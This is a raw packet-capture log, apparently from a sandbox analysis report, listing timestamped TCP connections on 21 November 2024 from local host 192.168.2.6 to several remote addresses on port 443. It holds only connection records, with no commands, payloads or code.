                                                                                                                                                                              Nov 21, 2024 08:30:45.242156029 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.242160082 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.275465012 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.275542021 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.275644064 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.330775023 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.330802917 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.330816984 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.330823898 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.421255112 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.421374083 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.421473980 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.455945969 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.455993891 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.576477051 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.576643944 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.576695919 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.593676090 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.593688965 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.593702078 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.593708038 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.612343073 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.612391949 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.612453938 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.613985062 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.614003897 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.000158072 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.000564098 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.000598907 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.001159906 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.001164913 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.091217041 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.093837976 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.093852997 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.094274044 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.094279051 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.195975065 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.196535110 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.196582079 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.197159052 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.197175980 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.434901953 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.434962034 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.435024023 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.519200087 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.519222975 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.519233942 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.519241095 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.536920071 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.536993027 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.537075996 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.561877012 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.561916113 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.561935902 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.561944962 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.564846992 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.564908028 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.564970970 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.565083981 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.565128088 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.565259933 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.565402031 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.565418959 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.565463066 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.565475941 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.648411036 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.648497105 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.648550034 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.648679972 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.648694038 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.651354074 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.651386976 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:46.651469946 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.651690960 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:46.651706934 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.300476074 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.300997972 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.301012039 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.301449060 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.301453114 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.401627064 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.402097940 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.402121067 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.402781963 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.402786970 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.753304958 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.753376007 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.753439903 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.753612041 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.753633022 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.753658056 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.753664017 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.756320953 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.756350994 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.756441116 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.756642103 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.756659031 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.846188068 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.846366882 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.846437931 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.846515894 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.846561909 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.846596956 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.846615076 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.850028992 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.850058079 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:47.850155115 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.850315094 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:47.850331068 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.345832109 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.345917940 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.346299887 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.346385956 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.346534014 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.346561909 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.346767902 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.346772909 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.347034931 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.347040892 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.434654951 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.435065031 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.435087919 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.435698032 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.435703039 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.791791916 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.791853905 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.791901112 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.792124033 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.792124033 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.792145014 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.792154074 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.792438984 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.792510986 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.792690039 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.792690039 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.792733908 CET49800443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.792751074 CET4434980013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.795756102 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.795847893 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.795897961 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.795923948 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.795933962 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.796029091 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.796138048 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.796149015 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.796210051 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.796247005 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.878942966 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.879086018 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.879228115 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.879287958 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.879287958 CET49801443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.879298925 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.879307985 CET4434980113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.882002115 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.882040977 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.882280111 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.882452011 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:48.882463932 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.535655022 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.543368101 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.543386936 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.544305086 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.544311047 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.637166023 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.638048887 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.638082981 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.638572931 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.638581038 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.979581118 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.979662895 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.979820013 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.979902983 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.979926109 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.979969025 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.979974985 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.983798981 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.983834028 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.983887911 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.984467030 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:49.984479904 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.023274899 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:50.023384094 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.023463011 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:50.024168968 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:50.024218082 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.081121922 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.081300020 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.081454992 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.081950903 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.081990957 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.082021952 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.082042933 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.084790945 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.084839106 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.085002899 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.085175991 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.085191011 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.404812098 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.407690048 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.407712936 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.408130884 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.408137083 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.610779047 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.614784002 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.615000010 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.615036011 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.615463018 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.615468979 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.616071939 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.616131067 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.616542101 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.616554976 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.688265085 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:50.688312054 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.688404083 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:50.690016031 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:50.690032959 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.849340916 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.849419117 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.849514008 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.849814892 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.849814892 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.849828005 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.849838972 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.853003979 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.853043079 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.853338003 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.853585005 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:50.853599072 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.045526981 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.045689106 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.045761108 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.059971094 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.060034990 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.060100079 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.066876888 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.066876888 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.066900969 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.066911936 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.136024952 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.136024952 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.136071920 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.136102915 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.211824894 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.211852074 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.211911917 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.214096069 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.214113951 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.230000973 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.230046034 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.230118990 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.230815887 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.230874062 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.468203068 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.468559980 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:51.468616962 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.470257998 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.470360041 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:51.471503019 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:51.471599102 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.514203072 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:51.514226913 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.559351921 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:30:51.701992989 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.718175888 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.718197107 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.718997955 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.719002008 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.811775923 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.816623926 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.816660881 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:51.817049026 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:51.817054033 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.138927937 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.139012098 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.139062881 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.176256895 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.176256895 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.176292896 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.176306009 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.189018011 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.189042091 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.189112902 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.205940962 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.205955982 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.244122028 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.244191885 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.246367931 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.246444941 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.246592045 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.247350931 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.247373104 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.247386932 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.247392893 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.248711109 CET49814443192.168.2.6184.28.90.27
